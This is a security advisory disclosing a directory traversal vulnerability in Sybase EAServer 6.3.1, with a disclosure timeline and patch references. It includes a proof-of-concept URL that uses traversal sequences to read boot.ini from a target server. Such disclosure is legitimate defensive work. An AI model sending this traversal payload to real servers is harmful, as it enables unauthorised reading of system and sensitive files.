Sybase EAServer is the leading solution for distributed and Web-enabled PowerBuilder applications. EAServer can be used to run multiple websites, portals or Web applications. It allows access from Web browsers and provides a development platform for enterprise Web services.
Sow Ching Shiong, an independent vulnerability researcher, has identified a Directory Traversal vulnerability in Sybase EAServer. This issue was discovered in a default installation of Sybase EAServer 6.3.1 Developer Edition running on Windows 2003 Server. Other earlier versions may also be affected.
Proof of concept
http://[target]:8000/images//.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4K7amScLu5WD7nL-UX2EBU9ySxu23F_NIyqdBz6pZlZ-qZ654s6maW9LblqhJSN1Cpkk3z0iefa9IMScY31z91hxugXmBu_tgKA_O3gVvSEdYJKu8h_EnTl9_51NTkX3pW_LCQRmlAwy2/s400/Sybase-EA-Server-Dir-Traversal-01.png)
Solution
Sybase has released patches which address this issue. Please see the references for more information.
References
Vendor URL: http://www.sybase.com/detail?id=1093216
iDefense: http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=912
Secunia: http://secunia.com/advisories/44666/
Disclosure Timeline
2011-01-25 - Vulnerability discovered.
2011-01-25 - Vulnerability reported to iDefense.
2011-03-29 - iDefense confirmed the vulnerability and contacted the vendor.
2011-05-23 - Patch released.
2011-05-25 - Advisory published by iDefense.